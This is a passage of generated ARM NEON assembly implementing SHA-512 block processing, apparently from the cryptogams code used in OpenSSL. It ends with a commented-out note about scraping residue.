vshr.u64 d24,d22,#14 @ from NEON_00_15
vadd.i64 q3,q14
vshr.u64 d25,d22,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d22,#41 @ from NEON_00_15
vadd.i64 q3,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 22<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d6
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 23
#if 23<16
vld1.64 {d7},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 23>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 23<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d7
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
vshr.u64 q12,q3,#19
vshr.u64 q13,q3,#61
vadd.i64 d16,d30 @ h+=Maj from the past
vshr.u64 q15,q3,#6
vsli.64 q12,q3,#45
vext.8 q14,q4,q5,#8 @ X[i+1]
vsli.64 q13,q3,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q4,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q0,q1,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d20,#14 @ from NEON_00_15
vadd.i64 q4,q14
vshr.u64 d25,d20,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d20,#41 @ from NEON_00_15
vadd.i64 q4,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 24<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d8
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 25
#if 25<16
vld1.64 {d9},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 25>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 25<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d9
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 q12,q4,#19
vshr.u64 q13,q4,#61
vadd.i64 d22,d30 @ h+=Maj from the past
vshr.u64 q15,q4,#6
vsli.64 q12,q4,#45
vext.8 q14,q5,q6,#8 @ X[i+1]
vsli.64 q13,q4,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q5,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q1,q2,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d18,#14 @ from NEON_00_15
vadd.i64 q5,q14
vshr.u64 d25,d18,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d18,#41 @ from NEON_00_15
vadd.i64 q5,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 26<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d10
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 27
#if 27<16
vld1.64 {d11},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 27>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 27<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d11
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 q12,q5,#19
vshr.u64 q13,q5,#61
vadd.i64 d20,d30 @ h+=Maj from the past
vshr.u64 q15,q5,#6
vsli.64 q12,q5,#45
vext.8 q14,q6,q7,#8 @ X[i+1]
vsli.64 q13,q5,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q6,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q2,q3,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d16,#14 @ from NEON_00_15
vadd.i64 q6,q14
vshr.u64 d25,d16,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d16,#41 @ from NEON_00_15
vadd.i64 q6,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 28<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d12
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 29
#if 29<16
vld1.64 {d13},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 29>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 29<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d13
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 q12,q6,#19
vshr.u64 q13,q6,#61
vadd.i64 d18,d30 @ h+=Maj from the past
vshr.u64 q15,q6,#6
vsli.64 q12,q6,#45
vext.8 q14,q7,q0,#8 @ X[i+1]
vsli.64 q13,q6,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q7,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q3,q4,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d22,#14 @ from NEON_00_15
vadd.i64 q7,q14
vshr.u64 d25,d22,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d22,#41 @ from NEON_00_15
vadd.i64 q7,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 30<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d14
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 31
#if 31<16
vld1.64 {d15},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 31>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 31<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d15
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
bne .L16_79_neon
vadd.i64 d16,d30 @ h+=Maj from the past
vldmia r0,{d24,d25,d26,d27,d28,d29,d30,d31} @ load context to temp
vadd.i64 q8,q12 @ vectorized accumulate
vadd.i64 q9,q13
vadd.i64 q10,q14
vadd.i64 q11,q15
vstmia r0,{d16,d17,d18,d19,d20,d21,d22,d23} @ save context
teq r1,r2
sub r3,#640 @ rewind K512
bne .Loop_neon
vldmia sp!,{d8-d15}
bx lr @ .word 0xe12fff1e
.size cryptogams_sha512_block_data_order_neon,.-cryptogams_sha512_block_data_order_neon
#endif
@ NOTE(review): the four lines below are not assembly. They are dataset-viewer
@ boilerplate ("Subsets and Splits" / "No community queries yet" / "The top
@ public SQL queries from the community will appear here once available.")
@ that was accidentally appended to this generated file during scraping.
@ Left here only as commented-out text so the file assembles; safe to delete.
@ |
@ Subsets and Splits
@ No community queries yet
@ The top public SQL queries from the community will appear here once available.